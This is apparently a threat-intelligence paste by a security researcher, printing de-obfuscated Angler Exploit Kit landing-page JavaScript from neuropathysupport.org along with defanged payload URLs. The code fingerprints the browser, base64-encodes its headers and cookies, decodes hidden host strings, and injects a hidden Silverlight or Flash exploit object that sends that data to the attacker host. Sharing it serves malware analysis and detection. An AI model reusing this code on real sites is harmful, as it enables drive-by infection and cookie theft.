Angler EK De-obfuscated neuropathysupport.org

1. Angler EK De-obfuscated
2. ******
3. Silverlight & Flash payloads
4. *******
5. Payloads
6. ******
7. hxxp://aergernisseravintolaansa.neuropathysupport.org/?r=&h=APBh302sN&n=&s=GX9rBCN&f=&g=NGGxo1&u=3rrRlwL_yk&p=XorhGc3a3&j=&b=Gox3uRJ    
8. hxxp://aergernisseravintolaansa.neuropathysupport.org/?t=D9E-&r=J34&e=CErpXFFb&u=cA0_ABU&q=&w=TtuCk&x=Osk2jQ&j=B-b0pm&s=&g=uFjZJJm7K
9. hxxp://aergernisseravintolaansa.neuropathysupport.org/?l=&i=Lm2y&q=es3NcAUV&v=pcqsF4goj&t=&k=Q-iA-FNZ8B&g=GDpEdRWQo&a=V2JKx-4rfd809a24395b2a6cb60110fb35a8ec6eebb15798
10. hxxp://aergernisseravintolaansa.neuropathysupport.org/?y=B-oC&d=UntZ9Bi&n=&x=nHxAGjttNaYVxBViYlO5Wq3xBaWaRMib5ojB_
11. hxxp://aergernisseravintolaansa.neuropathysupport.org/?y=U1EJRx-u&a=SynGIivs&g=&p=nUgqt&f=QjZMCxzw56keluQ174xhVpSASs0ee9cb60e9fa31459eb417f555ed94afa92937f3d
12. ******
13.  File1
14. ******
15.   function Jeh1jEjepq() {
16.       return window.btoa(window['cooc']);
17.   };
18.  
19.   function getKolaio() {
20.       return JWQC(ivKvzfcr_ivKvzfcr);
21.   }
22.  
23.   function getTxl() {
24.       return JWQC(ivKvzfcs_ivKvzfcs);
25.   }
26.  
27.   function gIu() {
28.       return JWQC(ivKvzfcw_ivKvzfcw);
29.   }
30.   var tSp = '<form id="form1" runat="server" style="height: 100%">' +
31. '<div id="silverlightControlHost">' +
32. '<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%">' +
33. '<param name="minRuntimeVersion" value="4.0.50524.0" />' +
34. '<param name="autoUpgrade" value="false" />' +
35. '<param name="source" value="http://' + getKolaio() + '/' + getTxl() + '" />' +
36. '<param name="initParams" value="gvTrvze=' + gIu() + ',KetErve=' + Jeh1jEjepq() + '"/>' +
37. '</object>' +
38. '</div>' +
39. '</form>';
40.   document.getElementsByTagName("q")[3].innerHTML = tSp;
41.  
42. ******
43.  File2
44. ******
45. if (window.T8eJEEf1) {
46.     var a = 'appendChild',
47.         d = document,
48.         w = window;
49.  
50.     function getH() {
51.         return w.btoa(w['cooc']);
52.     };
53.  
54.     function getKolaio() {
55.         return JWQC(ivKvzfck_ivKvzfck);
56.     }
57.  
58.     function getTxl(a) {
59.         return JWQC(ivKvzfcg_ivKvzfcg);
60.     }
61.  
62.     function getD() {
63.         return JWQC(ivKvzfct_ivKvzfct);
64.     }
65.  
66.     function getData(a) {
67.         return JWQC(ivKvzfcp_ivKvzfcp);
68.     }
69.  
70.     function getG() {
71.         return ivKvzfco_ivKvzfco;
72.     }
73.  
74.     function getDx() {
75.         if (!!w.dek1o) {
76.             return getD()
77.         } else {
78.             "ew"
79.         };
80.     }
81.     var s = 'setAttribute',
82.         mirtul = "1",
83.         ci = "clsid:",
84.         isMSIE = (function() {
85.             return (!!w.MSInputMethodContext ? 11 : !d.all ? 99 : w.atob ? 10 : d.addEventListener ? 9 : d.querySelector ? 8 : w.XMLHttpRequest ? 7 : d.compatMode ? 6 : w.attachEvent ? 5 : 1) < 11;
86.         })(),
87.         furl = 'http://' + getKolaio() + '/' + getTxl(mirtul),
88.         fvar = 'exec=' + getData(mirtul) + '&h=' + getH() + '&g=' + getG() + '&u=' + getD() + '';
89.  
90.     function cParam(pN, pV) {
91.         var p = d.createElement("param");
92.         p[s]("name", pN);
93.         p[s]("value", pV);
94.         return p;
95.     }
96.  
97.     function cObject(url, fv) {
98.         var div = d.createElement("div");
99.         div.innerHTML = "<object id='23kjsdf' classid='" + ci + "D27CDB6E-AE6D-11cf-96B8-444553540000' width=1 height=1 allowScriptAccess='always'>" + "<param name='movie' value='" + url + "'>" + "<param name='play' value='true'>" + "<param name='FlashVars' value='" + fv + "'>" + "</object>";
100.         return div.firstChild;
101.     }
102.     var obj = (isMSIE) ? cObject(furl, fvar) : document.createElement("object"),
103.         p1 = cParam('movie', 'http://' + getKolaio() + '/' + getTxl(mirtul)),
104.         p2 = cParam('play', 'true'),
105.         p3 = cParam('FlashVars', fvar);
106.     obj[s]("id", "23kjsdf");
107.     obj[s]("width", "1");
108.     obj[s]("height", "1");
109.     if (!isMSIE) {
110.         obj[s]("type", "application/x-shockwave-flash");
111.         obj[s]("data", furl);
112.         obj[a](p1);
113.         obj[a](p2);
114.         obj[a](p3);
115.     }
116.     if (w.s2e) {
117.         obj = 0
118.     }
119.     try {;
120.     } catch (e) {}
121.     var target_element = d.getElementsByTagName("q")[2];
122.     target_element.parentNode.replaceChild(obj, target_element);
123. }
124. ******
125.  File3
126. ******
127. window.T8eJEEf1 = true;
128. window.T8eJEEf2 = true;
129. if (!Array.prototype.indexOf) {
130.     Array.prototype.indexOf = function(obj, start) {
131.         for (var i = (start || 0), j = this.length; i < j; i++) {
132.             if (this[i] === obj) {
133.                 return i;
134.             }
135.         }
136.         return -1;
137.     };
138. }
139. if (!window.btoa) {
140.     var Base64 = {
141.         _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
142.         encode: function(b) {
143.             var q, l, p, f, k, g, d, m = "",
144.                 j = 0;
145.             for (b = Base64._utf8_encode(b); j < b.length;) {
146.                 q = b.charCodeAt(j++), l = b.charCodeAt(j++), p = b.charCodeAt(j++), f = q >> 2, k = (3 & q) << 4 | l >> 4, g = (15 & l) << 2 | p >> 6, d = 63 & p, isNaN(l) ? g = d = 64 : isNaN(p) && (d = 64), m = m + this._keyStr.charAt(f) + this._keyStr.charAt(k) + this._keyStr.charAt(g) + this._keyStr.charAt(d);
147.             }
148.             return m;
149.         },
150.         _utf8_encode: function(d) {
151.             d = d.replace(/\r\n/g, "\n");
152.             for (var c = "", f = 0; f < d.length; f++) {
153.                 var b = d.charCodeAt(f);
154.                 128 > b ? c += String.fromCharCode(b) : b > 127 && 2048 > b ? (c += String.fromCharCode(b >> 6 | 192), c += String.fromCharCode(63 & b | 128)) : (c += String.fromCharCode(b >> 12 | 224), c += String.fromCharCode(b >> 6 & 63 | 128), c += String.fromCharCode(63 & b | 128));
155.             }
156.             return c;
157.         }
158.     };
159.     window.btoa = function(str) {
160.         return Base64.encode(str);
161.     }
162. }
163. window['cooc'] = (function() {
164.     var ln1 = (navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage));
165.     var t = 'Accept: *\/*\r\n' + 'User-Agent: ' + navigator.userAgent + '\r\n' + (document.referrer ? 'Referer: ' + document.referrer + '\r\n' : "") + 'Accept-Language: ' + (!!ln1 ? ln1 : "en-US") + '\r\n' + 'Accept-Encoding: gzip, deflate' + (!!document.cookie ? '\r\nCookie: ' + document.cookie : '');
166.     return t;
167. })();
168. var p = 'push',
169.     i = 'indexOf';
170. window["JWQC"] = new Function('vtx', "var cryptKey = ivKvzfcu_ivKvzfcu, rA = cryptKey.split(''), sA = cryptKey.split(''), keyArray=[];sA.sort(); var keySize = sA.length;for (var i=0; i<keySize; i++) {keyArray." + p + "(rA." + i + "(sA[i]));}vtx = vtx.replace(/\\+/g,'%');var k = keySize - vtx.length % keySize;for(var l = 0; l<k;l++) {vtx += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < vtx.length; i += keySize) {line = vtx.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}delete(rA);delete(sA);delete(keyArray);delete(newLine);delete(line);endStr=endStr.replace(/\\s/g,'');return endStr;");
171.  
172.  
173.  
174. *******
175. *******
176. *******
177. More FROM @neonprimetime security
178.  
179. http://pastebin.com/u/Neonprimetime
180. https://www.virustotal.com/en/USER/neonprimetime/
181. https://twitter.com/neonprimetime
182. https://www.reddit.com/USER/neonprimetime